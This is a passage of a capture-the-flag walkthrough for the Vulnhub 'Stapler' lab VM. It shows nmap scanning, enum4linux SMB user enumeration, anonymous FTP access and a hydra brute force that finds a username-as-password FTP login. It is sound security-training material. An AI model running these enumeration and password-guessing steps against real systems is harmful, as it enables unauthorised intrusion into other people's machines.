Stapler is a boot to root virtual machine which is hosted on Vulnhub.
Description of the challenge
+---------------------------------------------------------+
| |
| __..--''\ |
| __..--'' \ |
| __..--'' __..--'' |
| __..--'' __..--'' | |
| \ o __..--''____....----"" |
| \__..--''\ |
| | \ |
| +----------------------------------+ |
| +----------------------------------+ |
| |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| Name: Stapler | IP: DHCP |
| Date: 2016-June-08 | Goal: Get Root! |
| Author: g0tmi1k | Difficultly: ??? ;) |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| |
| + Average beginner/intermediate VM, only a few twists |
| + May find it easy/hard (depends on YOUR background) |
| + ...also which way you attack the box |
| |
| + It SHOULD work on both VMware and Virtualbox |
| + REBOOT the VM if you CHANGE network modes |
| + Fusion users, you'll need to retry when importing |
| |
| + There are multiple methods to-do this machine |
| + At least two (2) paths to get a limited shell |
| + At least three (3) ways to get a root access |
| |
| + Made for BsidesLondon 2016 |
| + Slides: https://download.vulnhub.com/media/stapler/ |
| |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman |
| + ...and shout-outs to the VulnHub-CTF Team =) |
| |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
| |
| --[[~~Enjoy. Have fun. Happy Hacking.~~]]-- |
| |
+---------------------------------------------------------+Identify the IP address of Stapler machine
Nmap Ping Scan
root@kali:~# nmap -sn 192.168.1.1/24Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-14 21:32 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0032s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.2
Host is up (0.053s latency).
MAC Address: 70:70:0D:C9:AD:78 (Unknown)
Nmap scan report for 192.168.1.3
Host is up (0.098s latency).
MAC Address: B0:DF:3A:DE:59:08 (Samsung Electronics)
Nmap scan report for 192.168.1.9
Host is up (0.096s latency).
MAC Address: 54:EA:A8:7A:43:03 (Apple)
Nmap scan report for 192.168.1.10
Host is up (0.098s latency).
MAC Address: BC:9F:EF:69:35:19 (Unknown)
Nmap scan report for 192.168.1.11
Host is up (0.00015s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.12
Host is up (0.16s latency).
MAC Address: 04:56:04:47:D4:5C (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.092s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.15
Host is up (0.17s latency).
MAC Address: 80:3F:5D:21:DC:73 (Winstars Technology)
Nmap scan report for 192.168.1.30
Host is up (0.00069s latency).
MAC Address: 08:00:27:F7:14:0B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.28
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 15.82 seconds
root@kali:~#
Identify services running on Stapler
root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.30Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-14 21:37 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:37
Completed NSE at 21:37, 0.00s elapsed
Initiating NSE at 21:37
Completed NSE at 21:37, 0.00s elapsed
Initiating ARP Ping Scan at 21:37
Scanning 192.168.1.30 [1 port]
Completed ARP Ping Scan at 21:37, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:37
Completed Parallel DNS resolution of 1 host. at 21:37, 0.01s elapsed
Initiating Connect Scan at 21:37
Scanning 192.168.1.30 [65535 ports]
Discovered open port 80/tcp on 192.168.1.30
Discovered open port 139/tcp on 192.168.1.30
Discovered open port 21/tcp on 192.168.1.30
Discovered open port 53/tcp on 192.168.1.30
Discovered open port 22/tcp on 192.168.1.30
Discovered open port 3306/tcp on 192.168.1.30
Discovered open port 12380/tcp on 192.168.1.30
Connect Scan Timing: About 20.24% done; ETC: 21:39 (0:02:02 remaining)
Connect Scan Timing: About 48.38% done; ETC: 21:39 (0:01:05 remaining)
Discovered open port 666/tcp on 192.168.1.30
Completed Connect Scan at 21:38, 104.90s elapsed (65535 total ports)
Initiating Service scan at 21:38
Scanning 8 services on 192.168.1.30
Completed Service scan at 21:39, 18.59s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.30
NSE: Script scanning 192.168.1.30.
Initiating NSE at 21:39
Completed NSE at 21:39, 31.16s elapsed
Initiating NSE at 21:39
Completed NSE at 21:39, 0.02s elapsed
Nmap scan report for 192.168.1.30
Host is up (0.00059s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_ 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
| id.server:
|_ bind.version: dnsmasq-2.75
80/tcp open http
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 8
| Capabilities flags: 63487
| Some Capabilities: ConnectWithDatabase, Speaks41ProtocolOld, LongPassword, SupportsCompression, LongColumnFlag, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, IgnoreSigpipes, FoundRows, ODBCClient, SupportsTransactions, DontAllowDatabaseTableColumn, Support41Auth, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: -X{pKvU019`9J&5\x1C<up\x1E\x00
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.25BETA2%I=7%D=5/14%Time=591906B7%P=i686-pc-linux-gnu%r(G
SF:etRequest,27F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConnection:\x20close
SF:\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x20
SF:533\r\n\r\n<!doctype\x20html><html><head><title>404\x20Not\x20Found</ti
SF:tle><style>\nbody\x20{\x20background-color:\x20#fcfcfc;\x20color:\x20#3
SF:33333;\x20margin:\x200;\x20padding:0;\x20}\nh1\x20{\x20font-size:\x201\
SF:.5em;\x20font-weight:\x20normal;\x20background-color:\x20#9999cc;\x20mi
SF:n-height:2em;\x20line-height:2em;\x20border-bottom:\x201px\x20inset\x20
SF:black;\x20margin:\x200;\x20}\nh1,\x20p\x20{\x20padding-left:\x2010px;\x
SF:20}\ncode\.url\x20{\x20background-color:\x20#eeeeee;\x20font-family:mon
SF:ospace;\x20padding:0\x202px;}\n</style>\n</head><body><h1>Not\x20Found<
SF:/h1><p>The\x20requested\x20resource\x20<code\x20class=\"url\">/</code>\
SF:x20was\x20not\x20found\x20on\x20this\x20server\.</p></body></html>")%r(
SF:HTTPOptions,27F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConnection:\x20clo
SF:se\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x
SF:20533\r\n\r\n<!doctype\x20html><html><head><title>404\x20Not\x20Found</
SF:title><style>\nbody\x20{\x20background-color:\x20#fcfcfc;\x20color:\x20
SF:#333333;\x20margin:\x200;\x20padding:0;\x20}\nh1\x20{\x20font-size:\x20
SF:1\.5em;\x20font-weight:\x20normal;\x20background-color:\x20#9999cc;\x20
SF:min-height:2em;\x20line-height:2em;\x20border-bottom:\x201px\x20inset\x
SF:20black;\x20margin:\x200;\x20}\nh1,\x20p\x20{\x20padding-left:\x2010px;
SF:\x20}\ncode\.url\x20{\x20background-color:\x20#eeeeee;\x20font-family:m
SF:onospace;\x20padding:0\x202px;}\n</style>\n</head><body><h1>Not\x20Foun
SF:d</h1><p>The\x20requested\x20resource\x20<code\x20class=\"url\">/</code
SF:>\x20was\x20not\x20found\x20on\x20this\x20server\.</p></body></html>")%
SF:r(FourOhFourRequest,2A2,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConnection
SF::\x20close\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-L
SF:ength:\x20568\r\n\r\n<!doctype\x20html><html><head><title>404\x20Not\x2
SF:0Found</title><style>\nbody\x20{\x20background-color:\x20#fcfcfc;\x20co
SF:lor:\x20#333333;\x20margin:\x200;\x20padding:0;\x20}\nh1\x20{\x20font-s
SF:ize:\x201\.5em;\x20font-weight:\x20normal;\x20background-color:\x20#999
SF:9cc;\x20min-height:2em;\x20line-height:2em;\x20border-bottom:\x201px\x2
SF:0inset\x20black;\x20margin:\x200;\x20}\nh1,\x20p\x20{\x20padding-left:\
SF:x2010px;\x20}\ncode\.url\x20{\x20background-color:\x20#eeeeee;\x20font-
SF:family:monospace;\x20padding:0\x202px;}\n</style>\n</head><body><h1>Not
SF:\x20Found</h1><p>The\x20requested\x20resource\x20<code\x20class=\"url\"
SF:>/nice%20ports%2C/Tri%6Eity\.txt%2ebak</code>\x20was\x20not\x20found\x2
SF:0on\x20this\x20server\.</p></body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port666-TCP:V=7.25BETA2%I=7%D=5/14%Time=591906B1%P=i686-pc-linux-gnu%r(
SF:NULL,18F8,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0
SF:\x152\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01
SF:\x04\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@
SF:\xa2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\x
SF:a2\x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0
SF:f\xb2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\x
SF:aeu\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99
SF:\xd3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8
SF:\xa0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\
SF:[\x87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8
SF:b\xf4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe
SF:0\xdc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4
SF:\xd5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1
SF:\xaf\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\x
SF:e2:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1
SF:bk\x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\x
SF:cc\xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\
SF:xfd\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\x
SF:cc\x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\x
SF:b0\xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\
SF:[r\xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\x
SF:aak\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7
SF:fy\xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\
SF:x7f\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\x
SF:cb\[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf
SF:9\xcc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f
SF:\xa7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x
SF:81\xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI
SF:\x96\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\
SF:x8f\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\
SF:xf4\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\x
SF:cd\x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc
SF:\xbcL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\
SF:xf0\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x
SF:04\xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GT
SF:Q\xf3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x
SF:11\?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:F7:14:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.003 days (since Sun May 14 21:35:49 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| RED<00> Flags: <unique><active>
| RED<03> Flags: <unique><active>
| RED<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED
| Domain name:
| FQDN: red
|_ System time: 2017-05-15T02:39:18+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocolTRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 192.168.1.30NSE: Script Post-scanning.
Initiating NSE at 21:39
Completed NSE at 21:39, 0.00s elapsed
Initiating NSE at 21:39
Completed NSE at 21:39, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_ 1s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.08 seconds
Raw packets sent: 29 (2.784KB) | Rcvd: 13 (952B)
root@kali:~#
Port 139 — Enumerating SMB
Run enum4linux
root@kali:~# enum4linux -a 192.168.1.30
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 15 14:52:47 2017==========================
| Target Information |
==========================
Target ........... 192.168.1.30
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none====================================================
| Enumerating Workgroup/Domain on 192.168.1.30 |
====================================================
[+] Got domain/workgroup name: WORKGROUP============================================
| Nbtstat Information for 192.168.1.30 |
============================================
Looking up status of 192.168.1.30
RED <00> - H <ACTIVE> Workstation Service
RED <03> - H <ACTIVE> Messenger Service
RED <20> - H <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> H <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> H <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - H <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> H <ACTIVE> Browser Service ElectionsMAC Address = 00-00-00-00-00-00=====================================
| Session Check on 192.168.1.30 |
=====================================
[+] Server 192.168.1.30 allows sessions using username '', password ''===========================================
| Getting domain SID for 192.168.1.30 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup======================================
| OS information on 192.168.1.30 |
======================================
[+] Got OS info for 192.168.1.30 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
[+] Got OS info for 192.168.1.30 from srvinfo:
RED Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03=============================
| Users on 192.168.1.30 |
=============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.=========================================
| Share Enumeration on 192.168.1.30 |
=========================================
WARNING: The "syslog" option is deprecated
Connection to 192.168.1.30 failed (Error NT_STATUS_IO_TIMEOUT)[+] Attempting to map shares on 192.168.1.30====================================================
| Password Policy Information for 192.168.1.30 |
====================================================[+] Attaching to 192.168.1.30 using a NULL share[+] Trying protocol 445/SMB...[!] Protocol failed: [Errno 110] Connection timed out (192.168.1.30:445)[+] Trying protocol 139/SMB...[+] Found domain(s):[+] RED
[+] Builtin[+] Password Info for Domain: RED[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set[+] Retieved partial password policy with rpcclient:Password Complexity: Disabled
Minimum Password Length: 5==============================
| Groups on 192.168.1.30 |
==============================[+] Getting builtin groups:[+] Getting builtin group memberships:[+] Getting local groups:[+] Getting local group memberships:[+] Getting domain groups:[+] Getting domain group memberships:=======================================================================
| Users on 192.168.1.30 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
<snip>
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
<snip>
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
<snip>
^C
root@kali:~#
The output gives us a list of usernames. Lets extract them and keep them for later use.
root@kali:~# cat users.txt
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
root@kali:~# cat users.txt | cut -d '\' -f2 | cut -d ' ' -f1 > user_list.txt
peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
IChadwick
MFrei
SStroud
CCeaser
JKanode
CJoo
Eeth
LSolum2
JLipps
jamie
Drew
SHAY
Taylor
mel
kai
NATHAN
www
elly
root@kali:~#Port 21 — Enumerating FTP
Nmap has identified that the ftp service allows Anonymous login.
root@kali:~# ftp 192.168.1.30
Connected to 192.168.1.30.
220-
220-|--------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|--------------------------------------------------------------|
220-
220
Name (192.168.1.30:root): anonymous
331 Please specify the password.
Password:anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (133.2809 kB/s)
ftp> exit
221 Goodbye.
root@kali:~# ls -la note
-rw-r--r-- 1 root root 107 May 14 21:48 note
root@kali:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
root@kali:~#Lets crack FTP credentials using the user list we obtained using enum4linux.
root@kali:~# hydra -L user_list.txt -P user_list.txt 192.168.1.30 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-15 15:57:45
[DATA] max 16 tasks per 1 server, overall 64 tasks, 729 login tries (l:27/p:27), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.30 login: SHayslett password: SHayslett
[STATUS] 281.00 tries/min, 281 tries in 00:01h, 448 to do in 00:02h, 16 active
[STATUS] 281.50 tries/min, 563 tries in 00:02h, 166 to do in 00:01h, 16 active
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-15 16:00:22
root@kali:~# ftp 192.168.1.30
Connected to 192.168.1.30.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.30:root): SHayslett
331 Please specify the password.
Password:SHayslett
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 5 0 0 4096 Jun 03 2016 X11
drwxr-xr-x 3 0 0 4096 Jun 03 2016 acpi
-rw-r--r-- 1 0 0 3028 Apr 20 2016 adduser.conf
-rw-r--r-- 1 0 0 51 Jun 03 2016 aliases
-rw-r--r-- 1 0 0 12288 Jun 03 2016 aliases.db
drwxr-xr-x 2 0 0 4096 Jun 07 2016 alternatives
drwxr-xr-x 8 0 0 4096 Jun 03 2016 apache2
drwxr-xr-x 3 0 0 4096 Jun 03 2016 apparmor
drwxr-xr-x 9 0 0 4096 Jun 06 2016 apparmor.d
drwxr-xr-x 3 0 0 4096 Jun 03 2016 apport
drwxr-xr-x 6 0 0 4096 Jun 03 2016 apt
-rw-r----- 1 0 1 144 Jan 14 2016 at.deny
drwxr-xr-x 5 0 0 4096 Jun 03 2016 authbind
-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc
drwxr-xr-x 2 0 0 4096 Jun 03 2016 bash_completion.d
-rw-r--r-- 1 0 0 367 Jan 27 2016 bindresvport.blacklist
drwxr-xr-x 2 0 0 4096 Apr 12 2016 binfmt.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 byobu
drwxr-xr-x 3 0 0 4096 Jun 03 2016 ca-certificates
-rw-r--r-- 1 0 0 7788 Jun 03 2016 ca-certificates.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 console-setup
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.daily
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.hourly
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.monthly
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.weekly
-rw-r--r-- 1 0 0 722 Apr 05 2016 crontab
-rw-r--r-- 1 0 0 54 Jun 03 2016 crypttab
drwxr-xr-x 2 0 0 4096 Jun 04 2016 dbconfig-common
drwxr-xr-x 4 0 0 4096 Jun 03 2016 dbus-1
-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf
-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version
drwxr-xr-x 3 0 0 4096 Jun 05 2016 default
-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 depmod.d
drwxr-xr-x 4 0 0 4096 Jun 03 2016 dhcp
-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf
